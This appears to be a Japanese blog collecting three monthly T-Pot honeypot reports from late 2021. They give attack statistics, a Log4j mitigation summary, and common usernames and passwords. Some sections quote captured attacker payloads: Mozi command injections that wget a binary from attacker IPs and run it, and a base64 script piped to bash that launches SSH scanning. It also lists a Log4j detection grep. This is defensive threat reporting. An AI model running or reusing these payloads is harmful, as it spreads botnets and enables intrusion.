ハニーポット運用(月次報告:2021年12月)
今月のTopics
Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起が公開された。
JavaベースのオープンソースのロギングライブラリのApache Log4jには、任意のコード実行の脆弱性(CVE-2021-44228)がある。
Apache Log4jが動作するサーバーにおいて、遠隔の第三者が本脆弱性を悪用する細工したデータを送信することで、任意のコードを実行する可能性がある。Apache Log4j Security Vulnerabilities
Fixed in Log4j 2.15.0
https://logging.apache.org/log4j/2.x/security.html
※出典:Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://www.jpcert.or.jp/at/2021/at210050.html
www.ipa.go.jp www.jpcert.or.jp logging.apache.org
推奨の対策では以下が紹介されている。
・自身が管理するIT環境でlog4jを利用するシステムとソフトウェアを棚卸する。
(※時間のかかる作業なので、前もって始めた方が良い)・インターネットに接続されたソフトウェア/デバイスに対し、セキュリティパッチをすぐに適用する。
・社内のソフトウェア/デバイスに対応するセキュリティパッチをできるだけ早く適用する。
※何らかの理由でパッチが適用できない場合は、システムをインターネットから隔離し、以下の緩和策を適用することを強く推奨する。
Case1. バージョンが2.10 の場合
- log4j2.formatMsgNoLookups を true に設定する。
Case2. バージョンが2.0 から 2.10.0 までの場合
- 以下のコマンドを実行し、log4j から LDAP クラスを完全に削除する。
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- 一部のJVM バージョンでは、com.sun.jndi.rmi.object.trustURLCodebase および com.sun.jndi.cosnaming.object.trustURLCodebase を false に設定して、脆弱性を軽減させることが可能である。(一部の JVM のバージョンでは、すでにこの設定がデフォルトとなっている。)・Linux/Unixのコマンドを使用して、Webサーバーのログに悪用の試みがあるかどうか(成功したかどうかにかかわらず)を確認する。
sudo egrep -i -r '\${jndi:(ldap[s]?|rmi|dns):/[^entan]+' /var/log/・ネットワーク境界のログを確認し、IOC(indicators of compromise)のリストが存在するかどうかを確認する。
・SnortまたはSuricataベースの(あるいは互換性のある)ネットワークベースIDSを使用している場合、悪用の試みを検出するためのルールを使用する。
・脆弱性のあるシステムがある場合、スキャンは非常に強力であり、脆弱性のあるシステムが迅速に悪用されたと考えられるため、悪用の兆候がないか慎重にチェックする必要がある。
・WAF を使用している場合、log4j 固有のルールを導入する。Cloud Armor、Cloudflare WAF、Signal Sciences WAFなど、多くの商用ソリューションで利用可能である。
※出典:Zero-Day Exploit Targeting Popular Java Library Log4j
- https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
TryHackMeでも動作確認用のMachineが提供されている。
tryhackme.com
log4jは発表当初は恒久対応が確立されておらず、非常に深刻かつゼロデイ攻撃に該当する内容であった。
ゼロデイ攻撃に対する備えについて改めて考えさせられる内容であった。
個人情報保護法の改正(2022年4月より施行)により情報漏洩に対する企業への罰則強化が発表されており、セキュリティ対策費用<情報漏洩時の対応費用が現実味を帯びている。
来年度の予算取りに当たっては各企業様においてもセキュリティ対策予算の増加を検討頂きたい内容であった。(新法では罰金額の桁が違うので)
改正個人情報保護法の一部
| 対象 | 罰金額(旧法) | 罰金額(新法) |
|---|---|---|
| 措置命令(42条2項、3項)の違反の罰則 | 30万円以下 | 1億円以下 |
| 個人情報データベース等の不正流用 | 50万円以下 | 1億円以下 |
| 報告義務(40条)違反の罰則 | 30万円以下 | 50万円以下 |
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年12月1日-2021年12月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Heralding | 961,176 | 86,886 |
| 2 | Cowrie | 595,514 | ▲167,494 |
| 3 | Honeytrap | 566,628 | 50,052 |
| 4 | Dionaea | 409,308 | ▲43,816 |
| 5 | Rdpy | 97,024 | 12,641 |
| 6 | Adbhoney | 15,306 | 810 |
| 7 | Mailoney | 14,416 | ▲1,139 |
| 8 | Tanner | 4,336 | 1,248 |
| 9 | Ciscoasa | 2,674 | 627 |
| 10 | ConPot | 1,730 | 481 |
| 11 | CitrixHoneypot | 1,577 | 126 |
| 12 | ElasticPot | 1,072 | 76 |
| 13 | Medpot | 112 | ▲23 |
- Result
- 全体的なアクセス数の減少は継続中。
- Heraldingへのアクセス数は依然として多い。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Russia | 702,356 | 1(→) |
| 2 | Netherlands | 529,039 | 2(→) |
| 3 | United States | 421,708 | 4(↑) |
| 4 | China | 180,816 | 3(↓) |
| 5 | Ukraine | 81,292 | 7(↑) |
| 6 | Denmark | 74,584 | 圏外(↑) |
| 7 | India | 67,107 | 9(↑) |
| 8 | Vietnam | 65,611 | 8(→) |
| 9 | Japan | 36,691 | 13(↑) |
| 10 | Hong Kong | 30,701 | 圏外(↑) |
| 11 | Sweden | 27,433 | 12(↑) |
| 12 | South Korea | 25,406 | 圏外(↑) |
| 13 | Taiwan | 25,279 | 19(↑) |
| 14 | Brazil | 24,708 | 6(↓) |
| 15 | Latvia | 23,503 | 15(→) |
| 16 | Indonesia | 22,645 | 14(↓) |
| 17 | United Kingdom | 17,522 | 5(↓) |
| 18 | Poland | 16,694 | 圏外(↑) |
| 19 | Germany | 12,739 | 圏外(↑) |
| 20 | Thailand | 11,957 | 圏外(↑) |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,908,169 |
| 2 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 28 |
| 3 | CVE-2020-11910 | 12 |
- Result
- 検知されるCVEの種類も少なくなりつつある。
- Ripple20関連は相変わらず多い。
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 52,208 |
| 2 | sa | 27,629 |
| 3 | user | 4,872 |
| 4 | admin | 4,009 |
| 5 | postgres | 2,505 |
| 6 | hadoop | 1,708 |
| 7 | mysql | 1,618 |
| 8 | 22 | 1,351 |
| 9 | (empty) | 1,054 |
| 10 | !root | 686 |
| 11 | 2Wire | 671 |
| 12 | test | 454 |
| 13 | support | 415 |
| 14 | 0 | 351 |
| 15 | 666666 | 348 |
| 16 | unknown | 345 |
| 17 | adm | 343 |
| 18 | debug | 340 |
| 19 | blank | 339 |
| 20 | knockknockwhosthere | 313 |
| 21 | www | 300 |
| 22 | nproc | 299 |
| 23 | administrator | 267 |
| 24 | anonymous | 255 |
| 25 | Admin | 248 |
| 26 | user123 | 235 |
| 27 | db | 233 |
| 28 | www-data | 229 |
| 29 | ftp | 212 |
| 30 | pi | 199 |
| 31 | wwwroot | 193 |
| 32 | ubuntu | 177 |
| 33 | web | 176 |
| 34 | data | 169 |
| 35 | oracle | 150 |
| 36 | guest | 126 |
| 37 | git | 109 |
| 38 | testuser | 105 |
| 39 | server | 102 |
| 40 | ansible | 83 |
| 41 | ubnt | 72 |
| 42 | minecraft | 66 |
| 43 | zabbix | 66 |
| 44 | ftpuser | 54 |
| 45 | butter | 51 |
| 46 | dev | 47 |
| 47 | odoo | 40 |
| 48 | system | 33 |
| 49 | username | 33 |
| 50 | sh | 32 |
- Result
- 特記事項なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 30,709 |
| 2 | (empty) | 3,356 |
| 3 | 1 | 1,810 |
| 4 | password | 1,638 |
| 5 | blank | 1,015 |
| 6 | 123456 | 937 |
| 7 | root | 909 |
| 8 | Password | 900 |
| 9 | 12345 | 658 |
| 10 | 12345678 | 594 |
| 11 | 1234 | 489 |
| 12 | user | 476 |
| 13 | 0 | 459 |
| 14 | 00000000 | 447 |
| 15 | 666666 | 443 |
| 16 | ubnt | 399 |
| 17 | support | 395 |
| 18 | master | 376 |
| 19 | alpine | 366 |
| 20 | hi3518 | 356 |
| 21 | backup | 355 |
| 22 | unknown | 353 |
| 23 | !ishtar | 349 |
| 24 | synnet | 340 |
| 25 | 123 | 337 |
| 26 | Passw0rd | 317 |
| 27 | knockknockwhosthere | 309 |
| 28 | test | 306 |
| 29 | nproc | 294 |
| 30 | 123456789 | 206 |
| 31 | 1qaz2wsx | 203 |
| 32 | 1q2w3e4r | 171 |
| 33 | !QAZ2wsx | 163 |
| 34 | 1234567 | 150 |
| 35 | 1234567890 | 150 |
| 36 | 111111 | 147 |
| 37 | abc123 | 147 |
| 38 | qwerty | 142 |
| 39 | system | 136 |
| 40 | admin123 | 134 |
| 41 | 123123 | 114 |
| 42 | pass | 111 |
| 43 | 123qwe | 107 |
| 44 | 000000 | 106 |
| 45 | postgres | 94 |
| 46 | Admin@123 | 91 |
| 47 | x | 90 |
| 48 | iloveyou | 88 |
| 49 | root123 | 84 |
| 50 | oracle | 82 |
- Result
- 特記事項なし
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- log4jのような深刻度の高いゼロデイ攻撃は非常に参考になる。関連企業がサプライチェーン攻撃を受けた場合に発注元企業側も管理者責任の問われる範囲が個人情報保護法の改正により広がることを考えると、今回のlog4jの対応を契機に各企業におけるセキュリティ意識の向上につながればと個人的には思った。
- shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
/axissbins.sh
/bin.sh
/bin/sh
/bins.sh
/Ciabins.sh
/Hilix.sh
/sh
/telnet.sh
/wget.sh
/Yowai.sh
◆exeファイルに関するアクセス
/exiles.exe
360vz.exe
c.exe
ytnk.exe
◆jsファイルに関するアクセス
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/112[.]248.255.248:34891/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/113[.]116.34.83:56138/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]48.136.152:33245/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]56.171.76:51240/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/115[.]63.183.145:40679/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117[.]213.13.227:45111/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/192[.]168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/2[.]142.129.173:33496/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/203[.]170.98.130:3462/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/39[.]88.85.153:37461/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/61[.]52.61.43:46123/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/61[.]52.73.80:52652/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
ハニーポット運用(月次報告:2021年11月)
今月のTopics
12月はX-masにかけてセキュリティイベントが目白押しになる。
2021 SANS Holiday Hack Challenge & KringleCon www.sans.org
Advent of Cyber 3 (2021) tryhackme.com
後は11月~12月にかけてはAmazonのサイバーマンデーが例年開催されていたが今年は実施されなかった。(「Amazonブラックフライデー」の中で実施された模様だ。) www.watch.impress.co.jp
来年はセール期間に併せて試験資格の申し込みを実施できればと思う。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年11月1日-2021年11月30日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Heralding | 874,290 | 583,536 |
| 2 | Cowrie | 763,008 | ▲120,701 |
| 3 | Honeytrap | 516,576 | ▲233,343 |
| 4 | Dionaea | 453,124 | 33,880 |
| 5 | Rdpy | 84,383 | 8,235 |
| 6 | Mailoney | 15,555 | 4,940 |
| 7 | Adbhoney | 14,496 | ▲1,293 |
| 8 | Tanner | 3,088 | 3,005 |
| 9 | Ciscoasa | 2,047 | 789 |
| 10 | CitrixHoneypot | 1,451 | ▲117 |
| 11 | ConPot | 1,249 | ▲138 |
| 12 | ElasticPot | 996 | ▲1,737 |
| 13 | Medpot | 135 | ▲576 |
- Result
- 10月に引き続き全体のアクセス数は低下した。
- Heraldingの検知数がCowrieを抜いて1位に浮上した。Dionaeaの検知数が低下し、smbの脆弱性を狙う攻撃は下火になっているのかもしれない。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Russia | 737,276 | 1(→) |
| 2 | Netherlands | 607,689 | 2(→) |
| 3 | China | 261,468 | 3(→) |
| 4 | United States | 194,351 | 4(→) |
| 5 | United Kingdom | 123,493 | 圏外(↑) |
| 6 | Brazil | 106,915 | 7(↑) |
| 7 | Ukraine | 74,093 | 19(↑) |
| 8 | Vietnam | 68,156 | 6(↓) |
| 9 | India | 53,357 | 5(↓) |
| 10 | France | 37,557 | 圏外(↑) |
| 11 | Singapore | 27,598 | 17(↑) |
| 12 | Sweden | 26,310 | 13(↑) |
| 13 | Japan | 24,783 | 11(↓) |
| 14 | Indonesia | 23,771 | 9(↓) |
| 15 | Latvia | 23,028 | 12(↓) |
| 16 | Iran | 21,049 | 圏外(↑) |
| 17 | Mexico | 19,777 | 17(→) |
| 18 | Republic of Lithuania | 18,816 | 圏外(↑) |
| 19 | Taiwan | 14,475 | 10(↓) |
| 20 | Venezuela | 12,985 | 圏外(↑) |
- Result
- 英国、イラン、リトアニア共和国からのアクセスが増加していた。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,442,569 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 793 |
| 3 | CVE-2020-11910 | 45 |
| 4 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 24 |
| 5 | CVE-2014-2321 CVE-2014-2321 | 3 |
- Result
- 特記事項なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 101,532 |
| 2 | sa | 28,492 |
| 3 | admin | 4,187 |
| 4 | user | 3,470 |
| 5 | 22 | 1,341 |
| 6 | hadoop | 1,095 |
| 7 | (empty) | 1,067 |
| 8 | postgres | 832 |
| 9 | 2Wire | 677 |
| 10 | !root | 674 |
| 11 | test | 602 |
| 12 | anonymous | 507 |
| 13 | www | 491 |
| 14 | ftp | 489 |
| 15 | Admin | 467 |
| 16 | db | 459 |
| 17 | administrator | 456 |
| 18 | web | 455 |
| 19 | wwwroot | 432 |
| 20 | user123 | 415 |
| 21 | data | 414 |
| 22 | knockknockwhosthere | 414 |
| 23 | www-data | 410 |
| 24 | support | 374 |
| 25 | 0 | 360 |
| 26 | 666666 | 357 |
| 27 | debug | 339 |
| 28 | adm | 338 |
| 29 | blank | 337 |
| 30 | unknown | 325 |
| 31 | nproc | 267 |
| 32 | pi | 238 |
| 33 | mos | 134 |
| 34 | oracle | 132 |
| 35 | ubuntu | 116 |
| 36 | guest | 100 |
| 37 | Sato | 95 |
| 38 | mysql | 91 |
| 39 | server | 81 |
| 40 | ftpuser | 71 |
| 41 | git | 66 |
| 42 | ubnt | 55 |
| 43 | sh | 47 |
| 44 | dev | 41 |
| 45 | nginx | 41 |
| 46 | miner | 39 |
| 47 | minecraft | 37 |
| 48 | dell | 34 |
| 49 | nick | 34 |
| 50 | default | 32 |
- Result
- 特記事項なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 26,789 |
| 2 | (empty) | 3,724 |
| 3 | 1 | 1,588 |
| 4 | root | 1,419 |
| 5 | password | 1,408 |
| 6 | 123456 | 1,078 |
| 7 | blank | 1,019 |
| 8 | 12345 | 766 |
| 9 | 12345678 | 760 |
| 10 | 123 | 524 |
| 11 | 666666 | 511 |
| 12 | Samantha | 491 |
| 13 | 1234 | 486 |
| 14 | user | 485 |
| 15 | 0 | 482 |
| 16 | Password | 450 |
| 17 | knockknockwhosthere | 420 |
| 18 | 00000000 | 408 |
| 19 | master | 389 |
| 20 | support | 380 |
| 21 | ubnt | 376 |
| 22 | alpine | 364 |
| 23 | hi3518 | 353 |
| 24 | backup | 341 |
| 25 | unknown | 339 |
| 26 | !ishtar | 337 |
| 27 | synnet | 336 |
| 28 | 111111 | 323 |
| 29 | test | 296 |
| 30 | zaq12wsx | 264 |
| 31 | nproc | 261 |
| 32 | 1q2w3e4r | 251 |
| 33 | abc123 | 251 |
| 34 | musicman | 241 |
| 35 | 123456789 | 231 |
| 36 | qwerty | 225 |
| 37 | 1qaz2wsx | 224 |
| 38 | Passw0rd | 212 |
| 39 | 1234567 | 210 |
| 40 | 000000 | 207 |
| 41 | system | 194 |
| 42 | admin123 | 192 |
| 43 | 1234567890 | 176 |
| 44 | 123123 | 171 |
| 45 | 123qwe | 170 |
| 46 | iloveyou | 169 |
| 47 | passw0rd | 163 |
| 48 | Jennifer | 161 |
| 49 | 123qwe!@# | 158 |
| 50 | pass | 158 |
- Result
- Krane Malware関連のアクセスは多くは無いが今月も観測していた。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
ブラックフライデー中のため「サイバー術 プロに学ぶサイバーセキュリティ」を購入した。現在通読中。 book.mynavi.jp
来月で今年も終わり。今年受験予定だったセキュリティ資格は何もすすんでいない。
IPアドレス:221[.]195[.]1[.]201
Payload :
sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApta2RpciAuWDE3LXVuaXgKY2QgLlgxNy11bml4Cm12IC92YXIvdG1wL2RvdGEudGFyLmd6IGRvdGEudGFyLmd6CnRhciB4ZiBkb3RhLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDE3LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDA=" | base64 --decode | bash
↓
文字コード部分をPrintable形式にすると以下になる。
↓
#!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix mkdir .X17-unix cd .X17-unix mv /var/tmp/dota.tar.gz dota.tar.gz tar xf dota.tar.gz sleep 3s && cd /tmp/.X17-unix/.rsync/c nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1& sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1& sleep 20m && cd ..; /tmp/.X17-unix/.rsync/initall 2>1& exit 0
ハニーポット運用(月次報告:2021年10月)
今月のTopics
2021年10月04日にApache HTTP Serverにてパストラバーサルの脆弱性(CVE-2021-41773)に対する修正バージョンがリリースされた。
バージョン2.4.49のみが該当する脆弱性であり、2.4.50へのアップデートで解消される見込みであったが、2021年10月8日に2.4.50では別のパストラバーサルの脆弱性(CVE-2021-42013)があることが判明し、修正バージョン(2.4.51)がリリースされた。
※うちのハニーポットにはアクセスを確認できず。割と限定的な攻撃?
本脆弱性の影響を受けるのは以下条件に該当する場合になる。
- ドキュメントルート外のファイルが
require all deniedパラメータにより制限されていない mod_cgiモジュールが有効化されている。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年10月1日-2021年10月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 883,709 | ▲1,844,739 |
| 2 | Honeytrap | 749,919 | ▲523,547 |
| 3 | Dionaea | 419,244 | ▲362,080 |
| 4 | Heralding | 290,754 | ▲335,103 |
| 5 | Rdpy | 76,148 | ▲82,493 |
| 6 | Adbhoney | 15,789 | ▲15,146 |
| 7 | Mailoney | 10,615 | ▲3,724 |
| 8 | ElasticPot | 2,733 | ▲5,618 |
| 9 | CitrixHoneypot | 1,568 | ▲1,490 |
| 10 | ConPot | 1,387 | ▲1,817 |
| 11 | Ciscoasa | 1,258 | ▲33,653 |
| 12 | Medpot | 711 | ▲121 |
| 13 | Tanner | 83 | ▲2,966 |
- Result
- 先月と比較して全体のアクセス数が減少
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Russia | 568,461 | 2(↑) |
| 2 | Netherlands | 474,562 | 1(↓) |
| 3 | China | 394,075 | 3(→) |
| 4 | United States | 231,655 | 4(→) |
| 5 | India | 75,841 | 9(↑) |
| 6 | Vietnam | 71,655 | 11(↑) |
| 7 | Brazil | 46,562 | 13(↑) |
| 8 | South Korea | 33,219 | 14(↑) |
| 9 | Indonesia | 29,821 | 17(↑) |
| 10 | Taiwan | 28,075 | 圏外(↑) |
| 11 | Japan | 24,998 | 10(↓) |
| 12 | Latvia | 24,889 | 16(↑) |
| 13 | Sweden | 24,718 | 19(↑) |
| 14 | Germany | 24,673 | 15(↑) |
| 15 | Monaco | 19,813 | 圏外(↑) |
| 16 | Singapore | 19,274 | 8(↓) |
| 17 | Mexico | 17,223 | 圏外(↑) |
| 18 | Thailand | 15,931 | 圏外(↑) |
| 19 | Ukraine | 14,398 | 圏外(↑) |
| 20 | Hong Kong | 14,314 | 圏外(↑) |
- Result
- アクセス数上位の国に変動は無し。
- 10位以下のアクセス数について先月では圏外だった国がランクインしていた。全体のアクセス数が減少したことで普段ランクインしない国からのアクセスが目立った印象。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,405,632 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 259 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 22 |
| 4 | CVE-2020-11910 | 8 |
| 5 | CVE-2020-8515 CVE-2020-8515 | 1 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 82,429 |
| 2 | admin | 5,917 |
| 3 | hadoop | 4,281 |
| 4 | user | 2,719 |
| 5 | sa | 2,717 |
| 6 | oracle | 1,616 |
| 7 | knockknockwhosthere | 1,568 |
| 8 | mysql | 1,568 |
| 9 | git | 1,554 |
| 10 | huawei | 1,508 |
| 11 | 22 | 1,398 |
| 12 | postgres | 1,239 |
| 13 | (empty) | 956 |
| 14 | !root | 705 |
| 15 | 2Wire | 698 |
| 16 | guest | 645 |
| 17 | support | 480 |
| 18 | nproc | 403 |
| 19 | 0 | 369 |
| 20 | test | 364 |
| 21 | blank | 353 |
| 22 | 666666 | 352 |
| 23 | adm | 351 |
| 24 | debug | 350 |
| 25 | unknown | 339 |
| 26 | anonymous | 261 |
| 27 | sh | 253 |
| 28 | www | 239 |
| 29 | pi | 236 |
| 30 | ftp | 230 |
| 31 | Admin | 199 |
| 32 | web | 184 |
| 33 | data | 180 |
| 34 | db | 179 |
| 35 | wwwroot | 173 |
| 36 | administrator | 166 |
| 37 | ubuntu | 153 |
| 38 | ftpuser | 121 |
| 39 | info | 85 |
| 40 | backup | 75 |
| 41 | helpdesk | 72 |
| 42 | manager | 72 |
| 43 | 71 | |
| 44 | contact | 70 |
| 45 | microsoft | 70 |
| 46 | office | 70 |
| 47 | scan | 70 |
| 48 | smtp | 70 |
| 49 | spam | 70 |
| 50 | www-data | 63 |
- Result
- 特記事項なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 19,693 |
| 2 | (empty) | 3,426 |
| 3 | root | 1,771 |
| 4 | knockknockwhosthere | 1,568 |
| 5 | 1 | 1,255 |
| 6 | blank | 1,045 |
| 7 | 123456 | 1,017 |
| 8 | password | 919 |
| 9 | 12345 | 769 |
| 10 | 0 | 529 |
| 11 | Password | 487 |
| 12 | user | 482 |
| 13 | 1234 | 473 |
| 14 | 666666 | 425 |
| 15 | 123 | 421 |
| 16 | ubnt | 405 |
| 17 | nproc | 403 |
| 18 | 0 | 401 |
| 19 | support | 393 |
| 20 | master | 390 |
| 21 | alpine | 387 |
| 22 | !ishtar | 362 |
| 23 | backup | 359 |
| 24 | hi3518 | 358 |
| 25 | synnet | 350 |
| 26 | unknown | 340 |
| 27 | 1q2w3e4r | 319 |
| 28 | 12345678 | 315 |
| 29 | test | 247 |
| 30 | Passw0rd | 219 |
| 31 | x | 205 |
| 32 | 1qaz2wsx | 199 |
| 33 | admin123 | 160 |
| 34 | 123456789 | 152 |
| 35 | abc123 | 152 |
| 36 | iloveyou | 135 |
| 37 | 111111 | 120 |
| 38 | 123123 | 118 |
| 39 | 1234567890 | 116 |
| 40 | 1234567 | 115 |
| 41 | qwerty | 110 |
| 42 | 0 | 109 |
| 43 | hadoop | 93 |
| 44 | Nr!_CapiBraksjdlfS@4827fVfg1 | 88 |
| 45 | raspberry | 87 |
| 46 | 321 | 86 |
| 47 | system | 86 |
| 48 | 123qwe | 85 |
| 49 | postgres | 83 |
| 50 | test123 | 82 |
- Result
- Nr!_CapiBraksjdlfS@4827fVfg1(44位)は
Krane Malwareのアクセスになる。
- Nr!_CapiBraksjdlfS@4827fVfg1(44位)は
アクセスログを抽出した結果は以下の通り。
| No | username | password | city_name | ip | country_name |
|---|---|---|---|---|---|
| 1 | root | Nr!_CapiBraksjdlfS@3111fVfg1 | - | 106[.]244[.]10[.]2 | South Korea |
| 2 | es | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 3 | chia | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 4 | hyjx | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 5 | azureuser | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 6 | git | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 7 | tomcat | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 8 | web | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
| 9 | cisco | Nr!_CapiBraksjdlfS@4827fVfg1 | Cheyenne | 107[.]189[.]13[.]122 | United States |
